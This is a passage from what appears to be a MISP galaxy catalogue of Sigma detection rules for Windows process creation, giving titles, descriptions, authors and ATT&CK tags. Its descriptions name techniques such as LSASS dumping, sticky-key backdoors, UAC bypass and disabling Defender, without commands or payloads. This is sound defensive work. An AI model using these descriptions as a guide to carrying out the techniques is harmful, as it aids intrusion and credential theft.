Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/12/04
falsepositive ['Unknown']
filename proc_creation_win_hktl_winpwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.discovery', 'attack.execution', 'attack.privilege_escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Potential NTLM Coercion Via Certutil.EXE

Detects possible NTLM coercion via certutil using the 'syncwithWU' flag

Internal MISP references

UUID 6c6d9280-e6d0-4b9d-80ac-254701b64916 which can be used as unique global reference for Potential NTLM Coercion Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_certutil_ntlm_coercion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Execution

Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

Internal MISP references

UUID 90d6bd71-dffb-4989-8d86-a827fedd6624 which can be used as unique global reference for Visual Studio Code Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel']
filename proc_creation_win_vscode_tunnel_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Sdclt Child Processes

A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.

Internal MISP references

UUID da2738f2-fadb-4394-afa7-0a0674885afa which can be used as unique global reference for Sdclt Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_sdclt_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Windows Binary Executed From WSL

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

Internal MISP references

UUID ed825c86-c009-4014-b413-b76003e33d35 which can be used as unique global reference for Windows Binary Executed From WSL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wsl_windows_binaries_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

HackTool - Wmiexec Default Powershell Command

Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

Internal MISP references

UUID 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0 which can be used as unique global reference for HackTool - Wmiexec Default Powershell Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/08
falsepositive ['Unlikely']
filename proc_creation_win_hktl_wmiexec_default_powershell.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement']

Potential SquiblyTwo Technique Execution

Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields

Internal MISP references

UUID 8d63dadf-b91b-4187-87b6-34a1114577ea which can be used as unique global reference for Potential SquiblyTwo Technique Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Florian Roth
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_wmic_squiblytwo_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1047', 'attack.t1220', 'attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Forfiles Command Execution

Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

Internal MISP references

UUID 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b which can be used as unique global reference for Forfiles Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2022/06/14
falsepositive ['Legitimate use via a batch script or by an administrator.']
filename proc_creation_win_forfiles_proxy_execution_.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Invoke-WebRequest Execution

Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location

Internal MISP references

UUID 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc which can be used as unique global reference for Suspicious Invoke-WebRequest Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_invoke_webrequest_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Internal MISP references

UUID 1ca6bd18-0ba0-44ca-851c-92ed89a61085 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_consent_comctl32.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Ie4uinit Lolbin Use From Invalid Path

Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories

Internal MISP references

UUID d3bf399f-b0cf-4250-8bb4-dfc192ab81dc which can be used as unique global reference for Ie4uinit Lolbin Use From Invalid Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/07
falsepositive ['ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache"']
filename proc_creation_win_lolbin_ie4uinit.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

NtdllPipe Like Activity Execution

Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe

Internal MISP references

UUID bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 which can be used as unique global reference for NtdllPipe Like Activity Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/05
falsepositive ['Unknown']
filename proc_creation_win_cmd_ntdllpipe_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Security Service Disabled Via Reg.EXE

Detects execution of "reg.exe" to disable security services such as Windows Defender.

Internal MISP references

UUID 5e95028c-5229-4214-afae-d653d573d0ec which can be used as unique global reference for Security Service Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), John Lambert (idea), elhoim
creation_date 2021/07/14
falsepositive ['Unlikely']
filename proc_creation_win_reg_disable_sec_services.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PUA - Mouse Lock Execution

In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.

Internal MISP references

UUID c9192ad9-75e5-43eb-8647-82a0a5b493e3 which can be used as unique global reference for PUA - Mouse Lock Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/13
falsepositive ['Legitimate uses of Mouse Lock software']
filename proc_creation_win_pua_mouselock_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.collection', 'attack.t1056.002']
Related clusters

To see the related clusters, click here.

Firewall Rule Update Via Netsh.EXE

Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule

Internal MISP references

UUID a70dcb37-3bee-453a-99df-d0c683151be6 which can be used as unique global reference for Firewall Rule Update Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_set_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Exports Registry Key To a File

Detects the export of the target Registry key to a file.

Internal MISP references

UUID f0e53e89-8d22-46ea-9db5-9d4796ee2f8a which can be used as unique global reference for Exports Registry Key To a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate export of keys']
filename proc_creation_win_regedit_export_keys.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Weak or Abused Passwords In CLI

Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline

Internal MISP references

UUID 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 which can be used as unique global reference for Weak or Abused Passwords In CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/14
falsepositive ['Legitimate usage of the passwords by users via commandline (should be discouraged)', 'Other currently unknown false positives']
filename proc_creation_win_susp_weak_or_abused_passwords.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Persistence Via Sticky Key Backdoor

By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.

Internal MISP references

UUID 1070db9a-3e5d-412e-8e7b-7183b616e1b3 which can be used as unique global reference for Persistence Via Sticky Key Backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/02/18
falsepositive ['Unlikely']
filename proc_creation_win_cmd_sticky_keys_replace.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.t1546.008', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Execution

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

Internal MISP references

UUID 2fdefcb3-dbda-401e-ae23-f0db027628bc which can be used as unique global reference for Sticky Key Like Backdoor Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018/03/15
falsepositive ['Unlikely']
filename proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.

WmiPrvSE Spawned A Process

Detects WmiPrvSE spawning a process

Internal MISP references

UUID d21374ff-f574-44a7-9998-4a8c8bf33d7d which can be used as unique global reference for WmiPrvSE Spawned A Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/15
falsepositive ['False positives are expected (e.g. in environments where WinRM is used legitimately)']
filename proc_creation_win_wmiprvse_spawning_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

Internal MISP references

UUID 05c36dd6-79d6-4a9a-97da-3db20298ab2d which can be used as unique global reference for XSL Script Execution Via WMIC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
creation_date 2019/10/21
falsepositive ['WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.', 'Static format arguments - https://petri.com/command-line-wmi-part-3']
filename proc_creation_win_wmic_xsl_script_processing.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Suspicious Regsvr32 Execution From Remote Share

Detects REGSVR32.exe to execute DLL hosted on remote shares

Internal MISP references

UUID 88a87a10-384b-4ad7-8871-2f9bf9259ce5 which can be used as unique global reference for Suspicious Regsvr32 Execution From Remote Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Unknown']
filename proc_creation_win_regsvr32_remote_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Abuse of Service Permissions to Hide Services Via Set-Service

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Internal MISP references

UUID 514e4c3a-c77d-4cde-a00f-046425e2301e which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Rare intended use of hidden services']
filename proc_creation_win_powershell_hide_services_via_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Detects the execution of a renamed version of the Plink binary

Internal MISP references

UUID 1c12727d-02bf-45ff-a9f3-d49806a3cf43 which can be used as unique global reference for Renamed Plink Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/06
falsepositive ['Unknown']
filename proc_creation_win_renamed_plink.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PUA - NPS Tunneling Tool Execution

Detects the use of NPS, a port forwarding and intranet penetration proxy server

Internal MISP references

UUID 68d37776-61db-42f5-bf54-27e87072d17e which can be used as unique global reference for PUA - NPS Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/08
falsepositive ['Legitimate use']
filename proc_creation_win_pua_nps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

MMC Spawning Windows Shell

Detects a Windows command line executable started from MMC

Internal MISP references

UUID 05a2ab7e-ce11-4b63-86db-ab32e763e11d which can be used as unique global reference for MMC Spawning Windows Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Karneades, Swisscom CSIRT
creation_date 2019/08/05
falsepositive No established falsepositives
filename proc_creation_win_mmc_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Creation via Masqueraded XML File

Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence

Internal MISP references

UUID dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c which can be used as unique global reference for Suspicious Scheduled Task Creation via Masqueraded XML File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel, Elastic (idea)
creation_date 2023/04/20
falsepositive ['Unknown']
filename proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1036.005', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Service DACL Abuse To Hide Services Via Sc.EXE

Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.

Internal MISP references

UUID a537cfc3-4297-4789-92b5-345bfd845ad0 which can be used as unique global reference for Service DACL Abuse To Hide Services Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_hide_sevices.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Execution from Suspicious Folder

Detects a suspicious execution from an uncommon folder

Internal MISP references

UUID 3dfd06d2-eaf4-4532-9555-68aca59f57c4 which can be used as unique global reference for Execution from Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_susp_execution_path.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential Process Injection Via Msra.EXE

Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics

Internal MISP references

UUID 744a188b-0415-4792-896f-11ddb0588dbc which can be used as unique global reference for Potential Process Injection Via Msra.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander McDonald
creation_date 2022/06/24
falsepositive ['Legitimate use of Msra.exe']
filename proc_creation_win_msra_process_injection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

LSASS Dump Keyword In CommandLine

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

Internal MISP references

UUID ffa6861c-4461-4f59-8a41-578c39f3f23e which can be used as unique global reference for LSASS Dump Keyword In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_susp_lsass_dmp_cli_keywords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Internal MISP references

UUID 074e0ded-6ced-4ebd-8b4d-53f55908119d which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/06
falsepositive ['Unlikely']
filename proc_creation_win_winrm_awl_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Splwow64 Without Params

Detects suspicious Splwow64.exe process without any command line parameters

Internal MISP references

UUID 1f1a8509-2cbb-44f5-8751-8e1571518ce2 which can be used as unique global reference for Suspicious Splwow64 Without Params in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_splwow64_cli_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

CreateDump Process Dump

Detects uses of the createdump.exe LOLOBIN utility to dump process memory

Internal MISP references

UUID 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 which can be used as unique global reference for CreateDump Process Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Command lines that use the same flags']
filename proc_creation_win_createdump_lolbin_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

RunDLL32 Spawning Explorer

Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way

Internal MISP references

UUID caa06de8-fdef-4c91-826a-7f9e163eef4b which can be used as unique global reference for RunDLL32 Spawning Explorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim, CD_ROM_
creation_date 2022/04/27
falsepositive ['Unknown']
filename proc_creation_win_rundll32_spawn_explorer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Copy From or To System Directory

Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

Internal MISP references

UUID fff9d2b7-e11c-4a69-93d3-40ef66189767 which can be used as unique global reference for Suspicious Copy From or To System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)', 'When cmd.exe and xcopy.exe are called directly', 'When the command contains the keywords but not in the correct order']
filename proc_creation_win_susp_copy_system_dir.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

HackTool - Empire PowerShell Launch Parameters

Detects suspicious powershell command line parameters used in Empire

Internal MISP references

UUID 79f4ede3-402e-41c8-bc3e-ebbf5f162581 which can be used as unique global reference for HackTool - Empire PowerShell Launch Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/20
falsepositive ['Other tools that incidentally use the same command line parameters']
filename proc_creation_win_hktl_empire_powershell_launch.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

Internal MISP references

UUID 2afafd61-6aae-4df4-baed-139fa1f4c345 which can be used as unique global reference for Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/01/16
falsepositive ['NTDS maintenance']
filename proc_creation_win_ntdsutil_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

PUA - PingCastle Execution From Potentially Suspicious Parent

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.

Internal MISP references

UUID b37998de-a70b-4f33-b219-ec36bf433dc0 which can be used as unique global reference for PUA - PingCastle Execution From Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_pua_pingcastle_script_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1595']
Related clusters

To see the related clusters, click here.

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN

dotnet.exe will execute any DLL and execute unsigned code

Internal MISP references

UUID d80d5c81-04ba-45b4-84e4-92eba40e0ad3 which can be used as unique global reference for Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2020/10/18
falsepositive ['System administrator Usage']
filename proc_creation_win_lolbin_dotnet.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

VMToolsd Suspicious Child Process

Detects suspicious child process creations of VMware Tools process which may indicate persistence setup

Internal MISP references

UUID 5687f942-867b-4578-ade7-1e341c46e99a which can be used as unique global reference for VMToolsd Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bohops, Bhabesh Raj
creation_date 2021/10/08
falsepositive ['Legitimate use by VM administrator']
filename proc_creation_win_vmware_vmtoolsd_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Veeam Backup Database Suspicious Query

Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.

Internal MISP references

UUID 696bfb54-227e-4602-ac5b-30d9d2053312 which can be used as unique global reference for Veeam Backup Database Suspicious Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Unknown']
filename proc_creation_win_sqlcmd_veeam_db_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

Detected Windows Software Discovery

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Internal MISP references

UUID e13f668e-7f95-443d-98d2-1816a7648a7b which can be used as unique global reference for Detected Windows Software Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/16
falsepositive ['Legitimate administration activities']
filename proc_creation_win_reg_software_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518']
Related clusters

To see the related clusters, click here.

Windows Shell/Scripting Processes Spawning Suspicious Programs

Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.

Internal MISP references

UUID 3a6586ad-127a-4d3b-a677-1e6eacdf8fde which can be used as unique global reference for Windows Shell/Scripting Processes Spawning Suspicious Programs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2018/04/06
falsepositive ['Administrative scripts', 'Microsoft SCCM']
filename proc_creation_win_susp_shell_spawn_susp_program.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.005', 'attack.t1059.001', 'attack.t1218']
Related clusters

To see the related clusters, click here.

AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument

Internal MISP references

UUID 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 which can be used as unique global reference for AgentExecutor PowerShell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), memory-shards
creation_date 2022/12/24
falsepositive ['Legitimate use via Intune management. You exclude script paths and names to reduce FP rate']
filename proc_creation_win_agentexecutor_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Powershell Inline Execution From A File

Detects inline execution of PowerShell code from a file

Internal MISP references

UUID ee218c12-627a-4d27-9e30-d6fb2fe22ed2 which can be used as unique global reference for Powershell Inline Execution From A File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Unknown']
filename proc_creation_win_powershell_exec_data_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New Kernel Driver Via SC.EXE

Detects creation of a new service (kernel driver) with the type "kernel"

Internal MISP references

UUID 431a1fdb-4799-4f3b-91c3-a683b003fc49 which can be used as unique global reference for New Kernel Driver Via SC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/14
falsepositive ['Rare legitimate installation of kernel drivers via sc.exe']
filename proc_creation_win_sc_new_kernel_driver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Gpresult Display Group Policy Information

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

Internal MISP references

UUID e56d3073-83ff-4021-90fe-c658e0709e72 which can be used as unique global reference for Gpresult Display Group Policy Information in MISP communities and other software using the MISP galaxy

External references
